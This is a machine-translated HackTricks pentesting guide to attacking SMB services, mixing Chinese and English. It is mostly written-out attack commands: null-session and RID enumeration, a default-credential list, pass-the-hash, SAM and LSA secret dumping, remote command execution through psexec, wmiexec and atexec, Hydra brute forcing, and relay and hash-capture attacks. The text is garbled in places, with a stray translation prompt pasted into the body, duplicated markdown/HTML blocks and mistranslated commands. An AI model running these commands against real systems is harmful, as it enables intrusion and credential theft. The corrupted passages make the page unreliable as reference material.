hacktricks/network-services-pentesting/pentesting-smb.md

139,445 - SMB 渗透测试

☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？想要在 HackTricks 中宣传你的公司吗？或者你想要获取最新版本的 PEASS 或下载 HackTricks 的 PDF吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品——The PEASS Family
• 获取官方 PEASS & HackTricks 商品
• 加入💬 Discord 群组 或 Telegram 群组，或者关注我在Twitter上的🐦@carlospolopm。
• 通过向hacktricks 仓库和hacktricks-cloud 仓库提交 PR 来分享你的黑客技巧。

端口 139

NetBIOS 代表 网络基本输入输出系统。它是一种软件协议，允许局域网（LAN）上的应用程序、个人电脑和桌面电脑与网络硬件进行通信，并在网络上传输数据。在 NetBIOS 网络上运行的软件应用程序通过它们的 NetBIOS 名称定位和识别彼此。NetBIOS 名称最长可达 16 个字符，并且通常与计算机名称分开。当一个应用程序（客户端）通过 TCP 端口 139 发送命令“呼叫”另一个客户端（服务器）时，它们会启动一个 NetBIOS 会话。（摘自这里）

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

端口445

虽然端口139在技术上被称为“NBT over IP”，但端口445是“SMB over IP”。SMB代表“Server Message Blocks”。现代语言中，Server Message Block也被称为Common Internet File System。该系统作为应用层网络协议主要用于在网络上的节点之间提供共享文件、打印机、串口和其他通信方式。

例如，在Windows上，SMB可以直接在TCP/IP上运行，而无需NetBIOS over TCP/IP。正如你所指出的，这将使用端口445。在其他系统上，你会发现服务和应用程序使用端口139。这意味着SMB正在使用NetBIOS over TCP/IP。（摘自这里）

445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

SMB

Server Message Block (SMB) 是一种客户端-服务器协议，用于管理对文件、整个目录和其他网络资源（如打印机、路由器或网络接口）的访问。该协议的主要应用领域是特定的Windows操作系统系列，其网络服务以向下兼容的方式支持SMB - 这意味着具有较新版本的设备可以轻松与安装有较旧Microsoft操作系统的设备进行通信。
通过免费软件项目Samba，还可以在Linux和Unix发行版中使用SMB，从而实现跨平台的SMB通信。

SMB服务器可以将其本地文件系统的任意部分作为共享提供。因此，对客户端可见的层次结构部分上独立于服务器上的结构。访问权限由访问控制列表（ACL）定义。它们可以根据**执行、读取和完全访问等属性以细粒度的方式**对个别用户或用户组进行控制。ACL是基于共享定义的，因此与在服务器上本地分配的权限不对应。

IPC$ 共享

来自书籍 Network Security Assessment 3rd edition

通过匿名空会话，您可以访问IPC$共享并与通过命名管道公开的服务进行交互。Kali Linux中的enum4linux实用程序非常有用；使用它，您可以获取以下信息：

• 操作系统信息
• 父域的详细信息
• 本地用户和组列表
• 可用SMB共享的详细信息
• 有效的系统安全策略

什么是NTLM

如果您不知道什么是NTLM，或者想了解它是如何工作和如何滥用它的，您会发现这个关于NTLM的页面非常有趣，其中解释了该协议的工作原理以及您如何利用它：

{% content-ref url="../windows-hardening/ntlm/" %} ntlm {% endcontent-ref %}

服务器枚举

扫描网络以搜索主机：

nbtscan -r 192.168.0.1/24

SMB 服务器版本

为了寻找可能的 SMB 版本漏洞，了解正在使用的版本非常重要。如果这些信息在其他工具中没有显示，你可以：

• 使用 MSF 辅助模块 _auxiliary/scanner/smb/smb_version
• 或者使用以下脚本：

#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1

搜索漏洞

To search for exploits, you can use various tools and resources. Here are some common methods:

• Exploit Databases: Websites like Exploit-DB, Rapid7, and Metasploit provide extensive databases of known exploits. You can search these databases using relevant keywords or specific vulnerabilities.

• Vulnerability Scanners: Tools like Nessus, OpenVAS, and Nexpose can scan networks and systems for known vulnerabilities and provide a list of potential exploits.

• Security Bulletins: Software vendors and security organizations often release security bulletins that detail vulnerabilities and their associated exploits. These bulletins can be found on the vendor's website or through security advisory services.

• Exploit Frameworks: Frameworks like Metasploit offer a wide range of exploits and payloads that can be used for penetration testing. These frameworks provide a command-line interface for searching and executing exploits.

Remember to always use these tools and resources responsibly and with proper authorization. Unauthorized exploitation of vulnerabilities is illegal and unethical.

msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb

可能的凭据

用户名	常见密码
(空白)	(空白)
guest	(空白)
Administrator, admin	(空白), password, administrator, admin
arcserve	arcserve, backup
tivoli, tmersrvd	tivoli, tmersrvd, admin
backupexec, backup	backupexec, backup, arcada
test, lab, demo	password, test, lab, demo

SMB环境信息

获取信息

#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

枚举用户、组和已登录用户

这些信息应该已经从enum4linux和enum4linux-ng中收集到了

crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups

枚举本地用户

Impacket

lookupsid.py -no-pass hostname.local

以下是关于黑客技术的一本书中的内容。以下内容来自文件network-services-pentesting/pentesting-smb.md。将相关的英文文本翻译成中文，并返回翻译结果，保持完全相同的markdown和html语法。请不要翻译代码、黑客技术名称、黑客术语、云/SaaS平台名称（如Workspace、aws、gcp...）、泄漏一词、渗透测试和markdown标签。此外，请不要添加任何额外的内容，只需提供翻译和markdown语法即可。

for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Metasploit - 枚举本地用户

use auxiliary/scanner/smb/smb_lookupsid
set rhosts 主机名.local
run

Enumerating LSARPC and SAMR rpcclient

{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %} rpcclient-enumeration.md {% endcontent-ref %}

GUI connection from linux

In the terminal:

xdg-open smb://cascade.htb/

In file browser window (nautilus, thunar, etc)

smb://friendzone.htb/general/

Shared Folders Enumeration

List shared folders

It is always recommended to look if you can access to anything, if you don't have credentials try using null credentials/guest user.

```markdown
## smbclient --no-pass -L //<IP> # 空用户
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> # 如果省略密码，将提示输入。使用 --pw-nt-hash，提供的密码是NT哈希值

## smbmap -H <IP> [-P <PORT>] # 空用户
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] # 凭证
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] # Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] # 递归列表

## crackmapexec smb <IP> -u '' -p '' --shares # 空用户
crackmapexec smb <IP> -u 'username' -p 'password' --shares # Guest用户
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares # Guest用户

### **Connect/List a shared folder**

```bash
# 使用smbclient进行连接
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #如果省略密码，将会提示输入。使用--pw-nt-hash，提供的密码是NT哈希值
# 使用--no-pass -c 'recurse;ls' 以smbclient递归列出文件列表

# 使用smbmap进行列出，不指定文件夹将列出所有内容
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # 递归列出
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # 非递归列出
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] # 使用哈希传递密码

Manually enumerate windows shares and connect to them

It may be possible that you are restricted to display any shares of the host machine and when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a short to try to manually connect to a share. To enumerate the shares manually you might want to look for responses like NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME, when using a valid session (e.g. null session or valid credentials). These may indicate whether the share exists and you do not have access to it or the share does not exist at all.

Common share names for windows targets are

• C$
• D$
• ADMIN$
• IPC$
• PRINT$
• FAX$
• SYSVOL
• NETLOGON

(Common share names from Network Security Assessment 3rd edition)

You can try to connect to them by using the following command

```markdown
使用空会话连接到Windows共享：

smbclient -U '%' -N \\\\<IP>\\<SHARE>

使用身份验证会话连接到Windows共享（将提示输入密码）：

smbclient -U '<USER>' \\\\<IP>\\<SHARE>

or this script (using a null session)

```bash
#/bin/bash

ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')

if [[ -z $output ]]; then
echo "[+] 可以创建一个空会话来访问 $share" # 如果命令成功执行，没有输出，因此假设已创建会话
else
echo $output # 输出错误信息（例如 NT_STATUS_ACCESS_DENIED 或 NT_STATUS_BAD_NETWORK_NAME）
fi
done

examples

```markdown
## SMB服务渗透

### smbclient命令

使用`smbclient`命令可以与SMB服务进行交互。以下是一些常用的`smbclient`命令示例：

- `smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here`：返回`NT_STATUS_BAD_NETWORK_NAME`错误。
- `smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$`：返回`NT_STATUS_ACCESS_DENIED`错误，或者甚至会给你一个会话。

<h2>SMB服务渗透</h2>

<h3>smbclient命令</h3>

<p>使用<code>smbclient</code>命令可以与SMB服务进行交互。以下是一些常用的<code>smbclient</code>命令示例：</p>

<ul>
<li><code>smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here</code>：返回<code>NT_STATUS_BAD_NETWORK_NAME</code>错误。</li>
<li><code>smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$</code>：返回<code>NT_STATUS_ACCESS_DENIED</code>错误，或者甚至会给你一个会话。</li>
</ul>

### Mount a shared folder

```bash
```shell
挂载 -t cifs //x.x.x.x/share /mnt/share
挂载 -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

### **Download files**

Read previous sections to learn how to connect with credentials/Pass-the-Hash.

```bash
#搜索并下载文件
sudo smbmap -R 文件夹 -H <IP> -A <文件名> -q # 以递归模式搜索文件并将其下载到 /usr/share/smbmap 中

# 下载全部文件
smbclient //<IP>/<共享目录>
> mask ""
> recurse
> prompt
> mget *
# 将所有文件下载到当前目录

Commands:

• mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
• recurse: toggles recursion on (default: off)
• prompt: toggles prompting for filenames off (default: on)
• mget: copies all files matching the mask from host to client machine

(Information from the manpage of smbclient)

Domain Shared Folders Search

• Snaffler****

Snaffler.exe -s -d domain.local -o snaffler.log -v data

使用Snaffler.exe工具，执行以下命令：

Snaffler.exe -s -d domain.local -o snaffler.log -v data

- `-s` 参数表示启用扫描模式。
- `-d domain.local` 参数指定要扫描的目标域名。
- `-o snaffler.log` 参数将扫描结果输出到名为snaffler.log的日志文件中。
- `-v data` 参数表示详细输出扫描结果的数据信息。

• CrackMapExec spider.
• -M spider_plus [--share <share_name>]
• --pattern txt

sudo crackmapexec smb 10.10.10.10 -u 用户名 -p 密码 -M spider_plus --share '部门共享'

Specially interesting from shares are the files called Registry.xml as they may contain passwords for users configured with autologon via Group Policy. Or web.config files as they contains credentials.

{% hint style="info" %} The SYSVOL share is readable by all authenticated users in the domain. In there you may find many different batch, VBScript, and PowerShell scripts.
You should check the scripts inside of it as you might find sensitive info such as passwords. {% endhint %}

Read Registry

You may be able to read the registry using some discovered credentials. Impacket reg.py allows you to try:

sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s

sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s

Post Exploitation

The default config of a Samba server is usually located in /etc/samba/smb.conf and might have some dangerous configs:

Setting	Description
browseable = yes	Allow listing available shares in the current share?
read only = no	Forbid the creation and modification of files?
writable = yes	Allow users to create and modify files?
guest ok = yes	Allow connecting to the service without using a password?
enable privileges = yes	Honor privileges assigned to specific SID?
create mask = 0777	What permissions must be assigned to the newly created files?
directory mask = 0777	What permissions must be assigned to the newly created directories?
logon script = script.sh	What script needs to be executed on the user's login?
magic script = script.sh	Which script should be executed when the script gets closed?
magic output = script.out	Where the output of the magic script needs to be stored?

The command smbstatus gives information about the server and about who is connected.

Authenticate using Kerberos

You can authenticate to kerberos using the tools smbclient and rpcclient:

```markdown
## SMB (Server Message Block) 渗透测试

### smbclient --kerberos //ws01win10.domain.com/C$

使用 `smbclient` 命令与 SMB 服务器建立连接，并使用 Kerberos 身份验证。连接的目标是 `ws01win10.domain.com` 主机上的共享文件夹 `C$`。

### rpcclient -k ws01win10.domain.com

使用 `rpcclient` 命令与 SMB 服务器建立连接，并使用 Kerberos 身份验证。连接的目标是 `ws01win10.domain.com` 主机。

<h2>SMB (Server Message Block) 渗透测试</h2>

<h3>smbclient --kerberos //ws01win10.domain.com/C$</h3>

<p>使用 <code>smbclient</code> 命令与 SMB 服务器建立连接，并使用 Kerberos 身份验证。连接的目标是 <code>ws01win10.domain.com</code> 主机上的共享文件夹 <code>C$</code>。</p>

<h3>rpcclient -k ws01win10.domain.com</h3>

<p>使用 <code>rpcclient</code> 命令与 SMB 服务器建立连接，并使用 Kerberos 身份验证。连接的目标是 <code>ws01win10.domain.com</code> 主机。</p>

## **Execute Commands**

### **crackmapexec**

crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:

```bash
```markdown
安装crackmapexec：

apt-get install crackmapexec

执行Powershell命令：

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

执行cmd命令：

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami

使用Pass-the-Hash技术：

crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami

使用不同的执行方法：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --exec-method {mmcexec,smbexec,atexec,wmiexec}

获取SAM信息：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam

获取LSASS内存哈希：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa

获取会话信息：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions

获取已登录用户：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users

枚举磁盘：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks

枚举用户：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users

枚举组：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups

枚举本地组：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups

获取密码策略：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol

使用RID暴力破解：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute

使用Pass-The-Hash技术：

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH>

### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)

Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

```bash
#如果没有提供密码，将会提示输入
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # 使用Pass-the-Hash

Using parameter-k you can authenticate against kerberos instead of NTLM

wmiexec/dcomexec

Stealthily execute a command shell without touching the disk or running a new service using DCOM via port 135.
In kali it is located on /usr/share/doc/python3-impacket/examples/

#如果没有提供密码，将会提示输入密码
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #提示输入密码
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #传递哈希
#您可以在命令的末尾添加要执行的CMD命令，如果不这样做，将提示一个半交互式shell

Using parameter-k you can authenticate against kerberos instead of NTLM

#如果没有提供密码，将会提示输入密码
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#您可以在命令的末尾添加要执行的CMD命令，如果不这样做，将提示一个半交互式shell

AtExec

Execute commands via the Task Scheduler (using \pipe\atsvc via SMB).
In kali it is located on /usr/share/doc/python3-impacket/examples/

./atexec.py [[domain/]username[:password]@] "command" ./atexec.py -hashes LM:NT administrator@10.10.10.175 "whoami"

./atexec.py [[域/]用户名[:密码]@]<目标名称或地址> "命令" ./atexec.py -hashes LM:NT administrator@10.10.10.175 "whoami"

Impacket reference

https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/

Bruteforce users credentials

This is not recommended, you could block an account if you exceed the maximum allowed tries

```shell
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #使用ridenum.py脚本对rid进行暴力破解，然后尝试对每个用户名进行暴力破解

## SMB relay attack

This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

## SMB-Trap

The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`

This happens with the functions:

* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream

Which are used by some browsers and tools (like Skype)

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)

### SMBTrap using MitMf

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)

## NTLM Theft

Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack).

[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)

## HackTricks Automatic Commands

协议名称：SMB 端口号：137、138、139 协议描述：服务器消息块

条目1： 名称：笔记 描述：SMB的笔记 注意：| 虽然端口139在技术上被称为“NBT over IP”，端口445是“SMB over IP”。SMB代表“服务器消息块”。现代语言中，服务器消息块也被称为常见的Internet文件系统。该系统作为应用层网络协议主要用于在网络上的节点之间提供共享访问文件、打印机、串口和其他通信方式。

#每当我看到一个开放的SMB端口时，我按照以下顺序运行这些命令

无凭证 nbtscan {IP} smbmap -H {IP} smbmap -H {IP} -u null -p null smbmap -H {IP} -u guest smbclient -N -L //{IP} smbclient -N //{IP}/ --option="client min protocol"=LANMAN1 rpcclient {IP} rpcclient -U "" {IP} crackmapexec smb {IP} crackmapexec smb {IP} --pass-pol -u "" -p "" crackmapexec smb {IP} --pass-pol -u "guest" -p "" GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/" getArch.py -target {IP}

有凭证 smbmap -H {IP} -u {Username} -p {Password} smbclient "\\{IP}\" -U {Username} -W {Domain_Name} -l {IP} smbclient "\\{IP}\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash hash crackmapexec smb {IP} -u {Username} -p {Password} --shares GetADUsers.py {Domain_Name}/{Username}:{Password} -all GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

https://book.hacktricks.xyz/pentesting/pentesting-smb

条目2： 名称：Enum4Linux 描述：常规SMB扫描 命令：enum4linux -a {IP}

条目3： 名称：Nmap SMB扫描1 描述：使用Nmap进行SMB漏洞扫描 命令：nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

条目4： 名称：Nmap SMB扫描2 描述：使用Nmap进行SMB漏洞扫描（不太具体） 命令：nmap --script smb-vuln* -Pn -p 139,445 {IP}

条目5： 名称：Hydra暴力破解 描述：需要用户名 命令：hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

条目6： 名称：SMB/SMB2 139/445无需运行msfconsole的mfs枚举 描述：SMB/SMB2 139/445枚举，无需运行msfconsole 注意：来源于https://github.com/carlospolop/legion 命令：msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>